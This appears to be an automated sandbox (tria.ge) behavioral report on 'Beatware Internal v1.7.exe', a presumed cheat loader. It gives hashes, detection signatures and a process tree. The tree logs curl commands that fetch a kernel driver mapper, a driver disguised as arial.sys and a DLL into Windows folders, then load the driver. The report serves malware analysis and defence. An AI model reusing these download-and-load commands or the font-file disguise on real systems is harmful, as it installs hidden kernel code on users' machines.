Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
73s -
max time network
69s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
10/05/2024, 23:15
Behavioral task
behavioral1
Sample
Beatware Internal v1.7.exe
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
Beatware Internal v1.7.exe
Resource
win10v2004-20240508-en
General
-
Target
Beatware Internal v1.7.exe
-
Size
8.3MB
-
MD5
1fbd8db9291a9ee4622ee2accc493ba0
-
SHA1
66cdda6c2789202f6c5f92a4e9bb970f3e095a9d
-
SHA256
9fffea08116948a80151baf5271b5ba94d54e11d4c9aa7315591626d11ac0242
-
SHA512
744f62ebc60cbe7c9f23c64e5e98c5309b673a8ff2b6c743bc4c27655efcdb43ea68474d6f39160adf74baf65c5036f8ea17b73038fb6ddd04698b5b1cdcccc5
-
SSDEEP
98304:mn2ihaZdUjS6fzR1vQ6cbrgsihQ4xbNs8kwzXRuLHJD1UQ17VOhKMVtOwwMltcc:O2i0IV7RtQhihDbNs8VRORSQsKM3Hwf
Malware Config
Signatures
-
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\lntYyeTrEfNahTUmehqQzIIO\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\lntYyeTrEfNahTUmehqQzIIO" gainlol.exe -
Executes dropped EXE 1 IoCs
pid Process 3312 gainlol.exe -
resource yara_rule behavioral2/memory/2368-1-0x00007FF703CB0000-0x00007FF70462B000-memory.dmp vmprotect behavioral2/memory/2368-174-0x00007FF703CB0000-0x00007FF70462B000-memory.dmp vmprotect -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 37 discord.com 38 discord.com -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\System32\gainlol.exe curl.exe File created C:\Windows\System32\internal.dll curl.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
pid Process 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Fonts\arial.sys curl.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1337824034-2731376981-3755436523-1000\{667DCD50-3ED8-4FFB-A819-014180711166} msedge.exe -
Suspicious behavior: EnumeratesProcesses 46 IoCs
pid Process 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 3772 msedge.exe 3772 msedge.exe 1664 msedge.exe 1664 msedge.exe 3684 msedge.exe 3684 msedge.exe 2452 identity_helper.exe 2452 identity_helper.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe 2368 Beatware Internal v1.7.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 3312 gainlol.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeLoadDriverPrivilege 3312 gainlol.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe 1664 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2368 wrote to memory of 2372 2368 Beatware Internal v1.7.exe 84 PID 2368 wrote to memory of 2372 2368 Beatware Internal v1.7.exe 84 PID 2368 wrote to memory of 3188 2368 Beatware Internal v1.7.exe 86 PID 2368 wrote to memory of 3188 2368 Beatware Internal v1.7.exe 86 PID 3188 wrote to memory of 552 3188 cmd.exe 87 PID 3188 wrote to memory of 552 3188 cmd.exe 87 PID 3188 wrote to memory of 2800 3188 cmd.exe 88 PID 3188 wrote to memory of 2800 3188 cmd.exe 88 PID 3188 wrote to memory of 1252 3188 cmd.exe 89 PID 3188 wrote to memory of 1252 3188 cmd.exe 89 PID 2368 wrote to memory of 1524 2368 Beatware Internal v1.7.exe 93 PID 2368 wrote to memory of 1524 2368 Beatware Internal v1.7.exe 93 PID 2368 wrote to memory of 1664 2368 Beatware Internal v1.7.exe 94 PID 2368 wrote to memory of 1664 2368 Beatware Internal v1.7.exe 94 PID 2368 wrote to memory of 3888 2368 Beatware Internal v1.7.exe 95 PID 2368 wrote to memory of 3888 2368 Beatware Internal v1.7.exe 95 PID 1664 wrote to memory of 3216 1664 msedge.exe 96 PID 1664 wrote to memory of 3216 1664 msedge.exe 96 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 1976 1664 msedge.exe 97 PID 1664 wrote to memory of 3772 1664 msedge.exe 98 PID 1664 wrote to memory of 3772 1664 msedge.exe 98 PID 1664 wrote to memory of 1928 1664 msedge.exe 99 PID 1664 wrote to memory of 1928 1664 msedge.exe 99 PID 1664 wrote to memory of 1928 1664 msedge.exe 99 PID 1664 wrote to memory of 1928 1664 msedge.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe"C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:2372
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe" MD5 | find /i /v "md5" | find /i /v "certutil"2⤵
- Suspicious use of WriteProcessMemory
PID:3188 -
C:\Windows\system32\certutil.execertutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe" MD53⤵PID:552
-
-
C:\Windows\system32\find.exefind /i /v "md5"3⤵PID:2800
-
-
C:\Windows\system32\find.exefind /i /v "certutil"3⤵PID:1252
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:1524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://beatware.xyz/discord2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa756c46f8,0x7ffa756c4708,0x7ffa756c47183⤵PID:3216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:23⤵PID:1976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:3772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:83⤵PID:1928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:13⤵PID:3792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:13⤵PID:3308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4892 /prefetch:13⤵PID:2796
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5284 /prefetch:13⤵PID:4124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4684 /prefetch:83⤵PID:3428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4656 /prefetch:83⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:3684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5492 /prefetch:83⤵PID:1544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5492 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:2452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:13⤵PID:2720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3868 /prefetch:13⤵PID:2616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:13⤵PID:3396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:13⤵PID:4748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:3888
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:4708
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:436
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:3680
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://link.storjshare.io/s/jwcmolxlugnnediqq4n5nfdfqcha/beatware.xyz0pass123%2Fudmanmapper.exe?download=1 --output C:/Windows/System32/gainlol.exe >nul 2>&12⤵PID:2312
-
C:\Windows\system32\curl.execurl https://link.storjshare.io/s/jwcmolxlugnnediqq4n5nfdfqcha/beatware.xyz0pass123%2Fudmanmapper.exe?download=1 --output C:/Windows/System32/gainlol.exe3⤵
- Drops file in System32 directory
PID:2648
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://link.storjshare.io/s/jxnohpz53w2wri3ycddt2vg64isa/beatware.xyz0pass123%2Fdriver.sys?download=1 --output C:/Windows/Fonts/arial.sys >nul 2>&12⤵PID:2508
-
C:\Windows\system32\curl.execurl https://link.storjshare.io/s/jxnohpz53w2wri3ycddt2vg64isa/beatware.xyz0pass123%2Fdriver.sys?download=1 --output C:/Windows/Fonts/arial.sys3⤵
- Drops file in Windows directory
PID:2468
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:/Windows/System32/gainlol.exe C:/Windows/Fonts/arial.sys2⤵PID:2912
-
C:\Windows\System32\gainlol.exeC:/Windows/System32/gainlol.exe C:/Windows/Fonts/arial.sys3⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:3312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:5108
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:1920
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://link.storjshare.io/s/jx5zf2cuq6hiahyssj4toh36hleq/beatware.xyz0pass123%2Finternal.dll?download=1 --output C:/Windows/System32/internal.dll >nul 2>&12⤵PID:4744
-
C:\Windows\system32\curl.execurl https://link.storjshare.io/s/jx5zf2cuq6hiahyssj4toh36hleq/beatware.xyz0pass123%2Finternal.dll?download=1 --output C:/Windows/System32/internal.dll3⤵
- Drops file in System32 directory
PID:2840
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4760
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1568
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD54158365912175436289496136e7912c2
SHA1813d11f772b1cfe9ceac2bf37f4f741e5e8fbe59
SHA256354de4b033ba6e4d85f94d91230cb8501f62e0a4e302cd4076c7e0ad73bedbd1
SHA51274b4f7b24ad4ea395f3a4cd8dbfae54f112a7c87bce3d286ee5161f6b63d62dfa19bb0d96bb7ed1c6d925f5697a2580c25023d5052c6a09992e6fd9dd49ea82b
-
Filesize
152B
MD5ce4c898f8fc7601e2fbc252fdadb5115
SHA101bf06badc5da353e539c7c07527d30dccc55a91
SHA256bce2dfaa91f0d44e977e0f79c60e64954a7b9dc828b0e30fbaa67dbe82f750aa
SHA51280fff4c722c8d3e69ec4f09510779b7e3518ae60725d2d36903e606a27ec1eaedbdbfac5b662bf2c19194c572ccf0125445f22a907b329ad256e6c00b9cf032c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize840B
MD5bca98d1cf3fe8e6f9e3aa8861ec4f2b4
SHA1f746415ea8e413db5e07096f4aeb7a14dd78b706
SHA25629054e1b14d297b31776563bf65250c6c6a750c8957f8c94e9368702ea37ed4f
SHA512d0124575b26fbae936ccf20aa11a6d14d00d8b0df9e8c20a2a9d1c1bc6750ea1ea34b83deff2c07c571ae11e1c29a58aa05b3948e56ede9279134de367212fd7
-
Filesize
6KB
MD565c20bdd4eb8f14964b28dfc4d0a6773
SHA1072e35d6c38f81b6bfe03b4c69a251a4c2e691fb
SHA25675191e827aed4adab9c9cffab8af12697001e638e69a165f4913ad2c19f60efe
SHA512d0f7a509be8e03918db5a792af1a0ff8440a8b8e007b07ffe6a83fc4293cb981eaf3a3450e06d3ecd9cf19bda879226c5de9e6cf0951e76143497659b1a50228
-
Filesize
6KB
MD5a75a306c798be92962313a82e867581e
SHA1608046ba43753fee98e349933fd26c01eb3f28f3
SHA2565a11855473cae7c3149f7655fd4ba3a8675ca38fb81bcba2dfb0bc79bb11e8e2
SHA5124de83eeb0e36b8263ecd1af76798c1aa95bf6cb57e04e827ccfbb93dd6f558340c75e76a93c83b25cb5acca114699ad620a46fb6405bca87e4ce803b19fcf58c
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
11KB
MD52aa3f89bf8ceae149183ec7b13d3b1c8
SHA12d79f8ad06aab48d390cd87cdc90ace9b6886a6b
SHA2567d3d3319680d754de02eda14ec16317585e4f2fb86ceaa4c9da99fa23c3c2a9f
SHA5126b5307e5116df523566b85de7337a063579b2c50dd815c7f8d03cc4b298bb56864273e63633937e7b154727d29d578e1dfac2763cbe6c278319fa10a1565aef9
-
Filesize
11KB
MD5c352495e5e6d50640db63ac16db2c406
SHA1120422b4ef3e0a5fa97783b370dfe22fe254cf47
SHA256d1e121f5e5f3be47248e9973aed3669bc82b161627b3a622e060139098e4a3b6
SHA5127691a97c81ffa63ec4199b5c89c7e2abad237ad17d422d8b040036f548869235651ebcbd75ba132a5fe070504d57c472f097cceee7700fa1bec2b4fbc90f26a8
-
Filesize
27KB
MD5334061e143b54efcbd9e17a51854dc02
SHA116bd1ab01326758ed4c7b0c7ac19847dc7bd6c58
SHA25690fb91509b573966184a35ca1a23d212fb97fdb67b6a3e6ec881ed1cf5dba474
SHA512fb4c7ec8b9a002bc03e3596cde7aa62d07d1e72d2ee587ba6044f6a66c765a1d610a83730589657fc2bdd5cb52521a02d9fdbce6ef92f3f91588775adf18ba72
-
Filesize
112KB
MD5e25351a9dd41d1c339530c465fe18569
SHA12461491598a2ab092b352f2caf375accde6e9d85
SHA256d38d41c4ef8b4ded6ddcba4d290231dc0521e9900ecd71c1db90d103fe19d869
SHA512888ab312cda4d811254ab56d73238fd4419a2c3a3d59fbce3dfabe466ccd9081927389acdc740c9414cd380a6fb42bd881b7105cb444321d38a2f728333dc9d1